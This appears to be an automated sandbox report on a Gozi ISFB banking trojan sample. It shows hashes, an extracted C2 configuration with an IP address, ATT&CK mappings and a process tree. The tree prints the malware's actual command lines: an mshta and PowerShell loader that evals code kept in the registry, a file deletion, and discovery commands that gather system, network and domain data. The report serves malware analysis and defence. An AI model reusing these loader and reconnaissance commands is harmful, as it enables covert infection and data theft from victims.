gozi_ifsb | edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
02-03-2022 20:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe
Size

2.5MB
MD5

b545e2b0fdf47667624c08999c0b873e
SHA1

da6f23f5a9fbd123025d6a2b9cd39c2355b7345c
SHA256

edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f
SHA512

908dc1ec45f023e649b9de0cc7cf32f2a02a404012cf78c393dce2b8064350a3ab1b8e541a920a6fdb94a17d05547ad77a1eda6a4e1c204472cf71749e71bda2

Score

10^/10

gozi_ifsb 20000 banker trojan

Malware Config

Extracted

Family

gozi_ifsb

Botnet

20000

skype.com/signin

143.198.56.58

Attributes

base_path
/peer/
build
250225
exe_type
loader
extension
.prv
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi_ifsb

Botnet

20000

skype.com/login

143.198.56.58

Attributes

base_path
/images/
build
250225
exe_type
worker
extension
.prv
server_id
50

rsa_pubkey.plain

aes.plain

rsa_pubkey.plain

Signatures

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb
Downloads MZ/PE file
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation mshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exepowershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2560 set thread context of 4284	2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe	RegAsm.exe
PID 220 set thread context of 2216	220	powershell.exe	Explorer.EXE
PID 2216 set thread context of 3832	2216	Explorer.EXE	cmd.exe
PID 2216 set thread context of 3408	2216	Explorer.EXE	RuntimeBroker.exe
PID 2216 set thread context of 3688	2216	Explorer.EXE	RuntimeBroker.exe
PID 3832 set thread context of 1092	3832	cmd.exe	PING.EXE
PID 2216 set thread context of 3580	2216	Explorer.EXE	RuntimeBroker.exe
PID 2216 set thread context of 2060	2216	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Discovers systems in the same network 1 TTPs 3 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exenet.exe

pid process

4916 net.exe
476 net.exe
964 net.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

3980 tasklist.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

2564 systeminfo.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1092 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

1092 PING.EXE

pid	process
4916	net.exe
476	net.exe
964	net.exe

pid	process
3980	tasklist.exe

pid	process
2564	systeminfo.exe

pid	process
1092	PING.EXE

pid	process
1092	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exeRegAsm.exepowershell.exeExplorer.EXE

pid	process
2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe
2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe
4284	RegAsm.exe
4284	RegAsm.exe
220	powershell.exe
220	powershell.exe
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

2216 Explorer.EXE
Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

220 powershell.exe
2216 Explorer.EXE
2216 Explorer.EXE
2216 Explorer.EXE
3832 cmd.exe
2216 Explorer.EXE
2216 Explorer.EXE

pid	process
2216	Explorer.EXE

pid	process
220	powershell.exe
2216	Explorer.EXE
2216	Explorer.EXE
2216	Explorer.EXE
3832	cmd.exe
2216	Explorer.EXE
2216	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exepowershell.exeExplorer.EXEtasklist.exe

description	pid	process
Token: SeDebugPrivilege	2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe
Token: SeDebugPrivilege	220	powershell.exe
Token: SeShutdownPrivilege	2216	Explorer.EXE
Token: SeCreatePagefilePrivilege	2216	Explorer.EXE
Token: SeShutdownPrivilege	2216	Explorer.EXE
Token: SeCreatePagefilePrivilege	2216	Explorer.EXE
Token: SeShutdownPrivilege	2216	Explorer.EXE
Token: SeCreatePagefilePrivilege	2216	Explorer.EXE
Token: SeDebugPrivilege	3980	tasklist.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

2216 Explorer.EXE

pid	process
2216	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.exe

description	pid	process	target process
PID 2560 wrote to memory of 4620	2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe	RegAsm.exe
PID 2560 wrote to memory of 4620	2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe	RegAsm.exe
PID 2560 wrote to memory of 4620	2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe	RegAsm.exe
PID 2560 wrote to memory of 4284	2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe	RegAsm.exe
PID 2560 wrote to memory of 4284	2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe	RegAsm.exe
PID 2560 wrote to memory of 4284	2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe	RegAsm.exe
PID 2560 wrote to memory of 4284	2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe	RegAsm.exe
PID 2560 wrote to memory of 4284	2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe	RegAsm.exe
PID 2560 wrote to memory of 4284	2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe	RegAsm.exe
PID 2560 wrote to memory of 4284	2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe	RegAsm.exe
PID 2560 wrote to memory of 4284	2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe	RegAsm.exe
PID 2560 wrote to memory of 4284	2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe	RegAsm.exe
PID 2560 wrote to memory of 4284	2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe	RegAsm.exe
PID 2560 wrote to memory of 4284	2560	edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe	RegAsm.exe
PID 3476 wrote to memory of 220	3476	mshta.exe	powershell.exe
PID 3476 wrote to memory of 220	3476	mshta.exe	powershell.exe
PID 220 wrote to memory of 3108	220	powershell.exe	csc.exe
PID 220 wrote to memory of 3108	220	powershell.exe	csc.exe
PID 3108 wrote to memory of 5044	3108	csc.exe	cvtres.exe
PID 3108 wrote to memory of 5044	3108	csc.exe	cvtres.exe
PID 220 wrote to memory of 4944	220	powershell.exe	csc.exe
PID 220 wrote to memory of 4944	220	powershell.exe	csc.exe
PID 4944 wrote to memory of 2712	4944	csc.exe	cvtres.exe
PID 4944 wrote to memory of 2712	4944	csc.exe	cvtres.exe
PID 220 wrote to memory of 2216	220	powershell.exe	Explorer.EXE
PID 220 wrote to memory of 2216	220	powershell.exe	Explorer.EXE
PID 220 wrote to memory of 2216	220	powershell.exe	Explorer.EXE
PID 220 wrote to memory of 2216	220	powershell.exe	Explorer.EXE
PID 2216 wrote to memory of 3408	2216	Explorer.EXE	RuntimeBroker.exe
PID 2216 wrote to memory of 3408	2216	Explorer.EXE	RuntimeBroker.exe
PID 2216 wrote to memory of 3832	2216	Explorer.EXE	cmd.exe
PID 2216 wrote to memory of 3832	2216	Explorer.EXE	cmd.exe
PID 2216 wrote to memory of 3832	2216	Explorer.EXE	cmd.exe
PID 2216 wrote to memory of 3832	2216	Explorer.EXE	cmd.exe
PID 2216 wrote to memory of 3832	2216	Explorer.EXE	cmd.exe
PID 2216 wrote to memory of 3408	2216	Explorer.EXE	RuntimeBroker.exe
PID 2216 wrote to memory of 3408	2216	Explorer.EXE	RuntimeBroker.exe
PID 2216 wrote to memory of 3688	2216	Explorer.EXE	RuntimeBroker.exe
PID 2216 wrote to memory of 3688	2216	Explorer.EXE	RuntimeBroker.exe
PID 3832 wrote to memory of 1092	3832	cmd.exe	PING.EXE
PID 3832 wrote to memory of 1092	3832	cmd.exe	PING.EXE
PID 3832 wrote to memory of 1092	3832	cmd.exe	PING.EXE
PID 2216 wrote to memory of 3688	2216	Explorer.EXE	RuntimeBroker.exe
PID 2216 wrote to memory of 3688	2216	Explorer.EXE	RuntimeBroker.exe
PID 2216 wrote to memory of 3580	2216	Explorer.EXE	RuntimeBroker.exe
PID 2216 wrote to memory of 3580	2216	Explorer.EXE	RuntimeBroker.exe
PID 3832 wrote to memory of 1092	3832	cmd.exe	PING.EXE
PID 3832 wrote to memory of 1092	3832	cmd.exe	PING.EXE
PID 2216 wrote to memory of 3580	2216	Explorer.EXE	RuntimeBroker.exe
PID 2216 wrote to memory of 3580	2216	Explorer.EXE	RuntimeBroker.exe
PID 2216 wrote to memory of 2024	2216	Explorer.EXE	cmd.exe
PID 2216 wrote to memory of 2024	2216	Explorer.EXE	cmd.exe
PID 2024 wrote to memory of 856	2024	cmd.exe	nslookup.exe
PID 2024 wrote to memory of 856	2024	cmd.exe	nslookup.exe
PID 2216 wrote to memory of 1612	2216	Explorer.EXE	cmd.exe
PID 2216 wrote to memory of 1612	2216	Explorer.EXE	cmd.exe
PID 2216 wrote to memory of 1856	2216	Explorer.EXE	cmd.exe
PID 2216 wrote to memory of 1856	2216	Explorer.EXE	cmd.exe
PID 2216 wrote to memory of 2060	2216	Explorer.EXE	cmd.exe
PID 2216 wrote to memory of 2060	2216	Explorer.EXE	cmd.exe
PID 2216 wrote to memory of 2060	2216	Explorer.EXE	cmd.exe
PID 2216 wrote to memory of 2060	2216	Explorer.EXE	cmd.exe
PID 1856 wrote to memory of 2564	1856	cmd.exe	systeminfo.exe
PID 1856 wrote to memory of 2564	1856	cmd.exe	systeminfo.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2216

C:\Users\Admin\AppData\Local\Temp\edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe
"C:\Users\Admin\AppData\Local\Temp\edb86e9c3d29b3d13c82562dc1aeb1cd7e2c33e2bfcbae30791bf1d1aaf4345f.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2560

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4620

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4284

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ld70='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ld70).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\3B357854-5E29-2581-409F-72297443C66D\\\ReplyJunk'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3476

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vuvgffve -value gp; new-alias -name rijpdl -value iex; rijpdl ([System.Text.Encoding]::ASCII.GetString((vuvgffve "HKCU:Software\AppDataLow\Software\Microsoft\3B357854-5E29-2581-409F-72297443C66D").DocumentLevel))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:220

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\md2rgzd4\md2rgzd4.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3108

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES552D.tmp" "c:\Users\Admin\AppData\Local\Temp\md2rgzd4\CSCD3C0C0473974D5F843D69355270D6BE.TMP"
5⤵
PID:5044

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bw4poetz\bw4poetz.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4944

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES55D9.tmp" "c:\Users\Admin\AppData\Local\Temp\bw4poetz\CSC89794ADBFCBC42E49791647E48AA48FA.TMP"
5⤵
PID:2712

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3832

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1092

C:\Windows\system32\cmd.exe
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\85BE.bi1"
2⤵
- Suspicious use of WriteProcessMemory
PID:2024

C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
3⤵
PID:856

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\85BE.bi1"
2⤵
PID:1612

C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:1856

C:\Windows\system32\systeminfo.exe
systeminfo.exe
3⤵
- Gathers system information
PID:2564

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:2060

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:4720

C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:2880

C:\Windows\system32\net.exe
net view
3⤵
- Discovers systems in the same network
PID:4916

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:4276

C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:4256

C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
3⤵
PID:4128

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:5068

C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:3044

C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3980

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:2648

C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:4864

C:\Windows\system32\driverquery.exe
driverquery.exe
3⤵
PID:3148

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:3040

C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:4560

C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
3⤵
PID:1428

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:3068

C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:3848

C:\Windows\system32\net.exe
net config workstation
3⤵
PID:3340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
4⤵
PID:3128

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:1948

C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:3592

C:\Windows\system32\nltest.exe
nltest /domain_trusts
3⤵
PID:3476

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:1424

C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:5008

C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
3⤵
PID:2268

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:4460

C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:3420

C:\Windows\system32\net.exe
net view /all /domain
3⤵
- Discovers systems in the same network
PID:476

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:4888

C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:4384

C:\Windows\system32\net.exe
net view /all
3⤵
- Discovers systems in the same network
PID:964

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:1660

C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\E80B.bin1 > C:\Users\Admin\AppData\Local\Temp\E80B.bin & del C:\Users\Admin\AppData\Local\Temp\E80B.bin1"
2⤵
PID:2036

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3408

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3580

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3688

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442
MD5
1cbb29c4cff3e2838eab6578c0e3d966

SHA1
17ff86eac5f7f83241de7b14f19f1fa3af042365

SHA256
c27d9d32f05e0a9480518acc0c0d0b87ceed376024e35db7661feb553aeab256

SHA512
3d083170e2711fda62685d9dbc3f8a5576f3353b8dcb063b7ed23bd72fc543483f548ccb2cd4b91a359806c5e464bf3fc81b3ff4c5117d2c88e62b87b6fd204f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442
MD5
6f4dd1239d68622976a648f11520af7d

SHA1
4c2a0624026b21e050177feea5a3c66d7373f56c

SHA256
21ec83cdac3c6a1e37e4f979010773cf373f9abfbb6931a05f6e63a7207ad35f

SHA512
3917bb15b1ee044b823036ae7eb5058daa6a27d515c71e81c98e40f5fd99110820b95a120fd045a185b748dd0d7a03c8c8c27e884b7818d9ef5b86ea30b4a754

Download Submit
C:\Users\Admin\AppData\Local\Temp\85BE.bi1
MD5
4f6429322fdfd711b81d8824b25fcd9c

SHA1
f7f917b64dd43b620bacd21f134d430d3c406aec

SHA256
d22c844d015c874bbdbeb12b73ef54585cbd435c28f50d536fb4ace26d859ed8

SHA512
e661f8d79b031a4a043a388ec17d82b5092859ac1d0ce6668a082feecf1da5665837ad1ef984751c7be174bbb6c1012f45d9f550d5cf65dc8b0e6cddcbdb0816

Download Submit
C:\Users\Admin\AppData\Local\Temp\85BE.bi1
MD5
4f6429322fdfd711b81d8824b25fcd9c

SHA1
f7f917b64dd43b620bacd21f134d430d3c406aec

SHA256
d22c844d015c874bbdbeb12b73ef54585cbd435c28f50d536fb4ace26d859ed8

SHA512
e661f8d79b031a4a043a388ec17d82b5092859ac1d0ce6668a082feecf1da5665837ad1ef984751c7be174bbb6c1012f45d9f550d5cf65dc8b0e6cddcbdb0816

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin
MD5
66ead12101740c8fdc8861f9ffd2a5fb

SHA1
d4cbdc660bc079a3cb359818216c7f4221ac8862

SHA256
3aab3a3c69417250660d383fab2be1ed8b60a0a3d731db9a79413f6714152341

SHA512
6487d2b672c34373e409c5fc2f17353bc51a8af3d565b089e4f5cebab7ae29770e2a8ad6f2bffd7b03dc3d4b805bc6a510a110c7c79de6f03445c3382a2a0fa6

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
470b24e78224ebac4e931e82a5040826

SHA1
5c18b73d140ee0da2ba99864880a4a49b12222e9

SHA256
23648c53b4e4fabe21206902ed4ec0a75f178e37bc57bd6d5a8c17aa0060fd3a

SHA512
44b204bf6b8afb830654bc2c17f1a743e8ba18df92c26441cf8210ed886e09f64198b4b8b8fe4288e18569282091c99f72840ca331458db48ca1804544376379

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
470b24e78224ebac4e931e82a5040826

SHA1
5c18b73d140ee0da2ba99864880a4a49b12222e9

SHA256
23648c53b4e4fabe21206902ed4ec0a75f178e37bc57bd6d5a8c17aa0060fd3a

SHA512
44b204bf6b8afb830654bc2c17f1a743e8ba18df92c26441cf8210ed886e09f64198b4b8b8fe4288e18569282091c99f72840ca331458db48ca1804544376379

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
07d9e694f018a62bdeeb57a571b3145d

SHA1
85ae24010cac7b83299dab183af6c92d54dae3ee

SHA256
db2fb26a114ea92c351de49377c808fdd67ef71fa88e8685a2be1d7b20bf7789

SHA512
a976a8d2b2b80a62926f482b7f6cc406cd6f223a8657d02cff0a8a4e404d7cc3e9f85e4e1623f5ee6e224c398375f12e95214457d43f9011152597c2d52db736

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
273bb9a3ebe8ebdca9f3253c28c5aa19

SHA1
636075d3f0d599ad027bda33c6a764f01ffc4841

SHA256
bd07997fbe8a89cc15be7889fd07ff0ffad51397bd1edf78eaaf247840a9973f

SHA512
648e913039a8f1e7ab3ca513bc4b1dfd5c44e2e8d3206e24a352b554f079df91bce7aa8ac05355bcc60c9ec4971d23c89f9efdcd6f23a4709b9ed49c1e295dbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
27cd7dddeab1987ef7140939a8bd53c4

SHA1
d155c4d68abacafc5ba3a67030f191a9b3af32f7

SHA256
6d32031db3ed9fde8555732f609f3c2648bb7885e0308eb6c9610aad62061d1f

SHA512
d0f47f058a6d7c0fc0440047f9a259a070d25421becef957d9c8aff5834e406def178f486cd41e2068fdebe11a59d39e76c4fef873d9751575282ce8f2ba50a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
3a8c736b322a79f09e9fd6c18429d5ce

SHA1
cfedd1571d6cc7890f49e4512668c6bd90eda745

SHA256
2b74312d4c10445b81d6ad4d50b264a53291768dadab9a9a3067aa19049a57a7

SHA512
8f07d540a1d5736888e1bc60d8a3a7cc3b9f209d521e1e39a0b11dc6a30fb0c223ecba3471bb2485aff98686054b0f1e82646daab4b80771028346afc04012f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
3a8c736b322a79f09e9fd6c18429d5ce

SHA1
cfedd1571d6cc7890f49e4512668c6bd90eda745

SHA256
2b74312d4c10445b81d6ad4d50b264a53291768dadab9a9a3067aa19049a57a7

SHA512
8f07d540a1d5736888e1bc60d8a3a7cc3b9f209d521e1e39a0b11dc6a30fb0c223ecba3471bb2485aff98686054b0f1e82646daab4b80771028346afc04012f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
11f6ae2c9702d564fc170e0bd4122955

SHA1
c4e515b47cb73fc2944587e8b181276155e6d112

SHA256
2a246b01a70ec2d8780d778acabe45605d6cba6853ac16797c2b67072e1f460c

SHA512
e5d79d9224073ee783e52f30577203c8672cbe61a955d67fe6812a60bada9e98e0743063dc1692dca3c9e78286bcf28dac734763fcf266bc1b3043356751f394

Download Submit
C:\Users\Admin\AppData\Local\Temp\E80B.bin1
MD5
11f6ae2c9702d564fc170e0bd4122955

SHA1
c4e515b47cb73fc2944587e8b181276155e6d112

SHA256
